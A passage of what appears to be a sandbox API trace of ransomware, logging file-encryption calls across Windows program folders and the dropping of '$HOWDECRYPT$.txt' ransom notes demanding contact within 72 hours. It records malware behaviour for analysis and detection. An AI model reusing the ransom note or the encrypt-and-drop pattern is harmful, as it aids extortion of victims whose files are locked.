(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.302] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce78c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce78c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.302] CloseHandle (hObject=0x178) returned 1 [0162.302] GetProcessHeap () returned 0x2c0000 [0162.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf460 | out: hHeap=0x2c0000) returned 1 [0162.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce728 | out: pbBuffer=0x25ce728) returned 1 [0162.302] GetProcessHeap () returned 0x2c0000 [0162.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.303] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce720*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce720*=0x30) returned 1 [0162.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.314] GetProcessHeap () returned 0x2c0000 [0162.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.314] GetProcessHeap () returned 0x2c0000 [0162.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8c38 | out: hHeap=0x2c0000) returned 1 [0162.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce728 | out: pbBuffer=0x25ce728) returned 1 [0162.314] GetProcessHeap () returned 0x2c0000 [0162.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.314] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce720*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce720*=0x30) returned 1 [0162.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmpnssui.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpnssui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.316] GetProcessHeap () returned 0x2c0000 [0162.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.316] GetProcessHeap () returned 0x2c0000 [0162.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e888 | out: hHeap=0x2c0000) returned 1 [0162.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce720 | out: pbBuffer=0x25ce720) returned 1 [0162.316] GetProcessHeap () returned 0x2c0000 [0162.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce718*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce718*=0x30) returned 1 [0162.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\wmplayer.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmplayer.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.316] GetProcessHeap () returned 0x2c0000 [0162.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.316] GetProcessHeap () returned 0x2c0000 [0162.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e6d8 | out: hHeap=0x2c0000) returned 1 [0162.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce720 | out: pbBuffer=0x25ce720) returned 1 [0162.317] GetProcessHeap () returned 0x2c0000 [0162.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce718*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce718*=0x30) returned 1 [0162.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMCCore.dll.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmccore.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.317] GetProcessHeap () returned 0x2c0000 [0162.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.317] GetProcessHeap () returned 0x2c0000 [0162.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb1d78 | out: hHeap=0x2c0000) returned 1 [0162.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce718 | out: pbBuffer=0x25ce718) returned 1 [0162.317] GetProcessHeap () returned 0x2c0000 [0162.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce710*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce710*=0x30) returned 1 [0162.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\en-US\\WMPDMC.exe.mui" (normalized: "c:\\program files (x86)\\windows media player\\en-us\\wmpdmc.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.322] GetProcessHeap () returned 0x2c0000 [0162.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.322] GetProcessHeap () returned 0x2c0000 [0162.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e600 | out: hHeap=0x2c0000) returned 1 [0162.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows mail\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.323] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.323] WriteFile (in: hFile=0x178, lpBuffer=0x25ce64b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce774, lpOverlapped=0x0 | out: lpBuffer=0x25ce64b*, lpNumberOfBytesWritten=0x25ce774*=0x127, lpOverlapped=0x0) returned 1 [0162.324] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.324] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce774, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce774*=0x2ac, lpOverlapped=0x0) returned 1 [0162.324] CloseHandle (hObject=0x178) returned 1 [0162.324] GetProcessHeap () returned 0x2c0000 [0162.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8b78 | out: hHeap=0x2c0000) returned 1 [0162.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce710 | out: pbBuffer=0x25ce710) returned 1 [0162.325] GetProcessHeap () returned 0x2c0000 [0162.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce708*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce708*=0x30) returned 1 [0162.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files (x86)\\windows mail\\winmail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.325] GetProcessHeap () returned 0x2c0000 [0162.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.325] GetProcessHeap () returned 0x2c0000 [0162.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebef60 | out: hHeap=0x2c0000) returned 1 [0162.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce710 | out: pbBuffer=0x25ce710) returned 1 [0162.325] GetProcessHeap () returned 0x2c0000 [0162.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce708*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce708*=0x30) returned 1 [0162.325] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.329] GetProcessHeap () returned 0x2c0000 [0162.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.329] GetProcessHeap () returned 0x2c0000 [0162.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebeeb0 | out: hHeap=0x2c0000) returned 1 [0162.329] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce708 | out: pbBuffer=0x25ce708) returned 1 [0162.329] GetProcessHeap () returned 0x2c0000 [0162.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.329] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce700*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce700*=0x30) returned 1 [0162.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\oeimport.dll" (normalized: "c:\\program files (x86)\\windows mail\\oeimport.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.334] GetProcessHeap () returned 0x2c0000 [0162.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.334] GetProcessHeap () returned 0x2c0000 [0162.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec19e0 | out: hHeap=0x2c0000) returned 1 [0162.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows defender\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.336] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.336] WriteFile (in: hFile=0x178, lpBuffer=0x25ce63b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce764, lpOverlapped=0x0 | out: lpBuffer=0x25ce63b*, lpNumberOfBytesWritten=0x25ce764*=0x127, lpOverlapped=0x0) returned 1 [0162.337] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.337] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce764, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce764*=0x2ac, lpOverlapped=0x0) returned 1 [0162.337] CloseHandle (hObject=0x178) returned 1 [0162.337] GetProcessHeap () returned 0x2c0000 [0162.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5df8 | out: hHeap=0x2c0000) returned 1 [0162.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce700 | out: pbBuffer=0x25ce700) returned 1 [0162.337] GetProcessHeap () returned 0x2c0000 [0162.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6f8*=0x30) returned 1 [0162.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.338] GetProcessHeap () returned 0x2c0000 [0162.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.338] GetProcessHeap () returned 0x2c0000 [0162.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8ab8 | out: hHeap=0x2c0000) returned 1 [0162.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce700 | out: pbBuffer=0x25ce700) returned 1 [0162.338] GetProcessHeap () returned 0x2c0000 [0162.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6f8*=0x30) returned 1 [0162.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1928 | out: hHeap=0x2c0000) returned 1 [0162.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6f8 | out: pbBuffer=0x25ce6f8) returned 1 [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6f0*=0x30) returned 1 [0162.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea89f8 | out: hHeap=0x2c0000) returned 1 [0162.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6f8 | out: pbBuffer=0x25ce6f8) returned 1 [0162.339] GetProcessHeap () returned 0x2c0000 [0162.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6f0*=0x30) returned 1 [0162.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.340] GetProcessHeap () returned 0x2c0000 [0162.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.340] GetProcessHeap () returned 0x2c0000 [0162.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8938 | out: hHeap=0x2c0000) returned 1 [0162.340] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6f0 | out: pbBuffer=0x25ce6f0) returned 1 [0162.340] GetProcessHeap () returned 0x2c0000 [0162.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6e8*=0x30) returned 1 [0162.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\fibreinvitations.exe" (normalized: "c:\\program files (x86)\\windows defender\\fibreinvitations.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.340] GetProcessHeap () returned 0x2c0000 [0162.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.340] GetProcessHeap () returned 0x2c0000 [0162.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07028 | out: hHeap=0x2c0000) returned 1 [0162.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.343] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.343] WriteFile (in: hFile=0x178, lpBuffer=0x25ce623*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce74c, lpOverlapped=0x0 | out: lpBuffer=0x25ce623*, lpNumberOfBytesWritten=0x25ce74c*=0x127, lpOverlapped=0x0) returned 1 [0162.344] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.344] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce74c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce74c*=0x2ac, lpOverlapped=0x0) returned 1 [0162.344] CloseHandle (hObject=0x178) returned 1 [0162.344] GetProcessHeap () returned 0x2c0000 [0162.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06f58 | out: hHeap=0x2c0000) returned 1 [0162.344] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6e8 | out: pbBuffer=0x25ce6e8) returned 1 [0162.344] GetProcessHeap () returned 0x2c0000 [0162.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.344] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6e0*=0x30) returned 1 [0162.344] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.344] GetProcessHeap () returned 0x2c0000 [0162.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.345] GetProcessHeap () returned 0x2c0000 [0162.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06e88 | out: hHeap=0x2c0000) returned 1 [0162.345] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce6e8 | out: pbBuffer=0x25ce6e8) returned 1 [0162.345] GetProcessHeap () returned 0x2c0000 [0162.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.345] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce6e0*=0x30) returned 1 [0162.345] CreateFileW 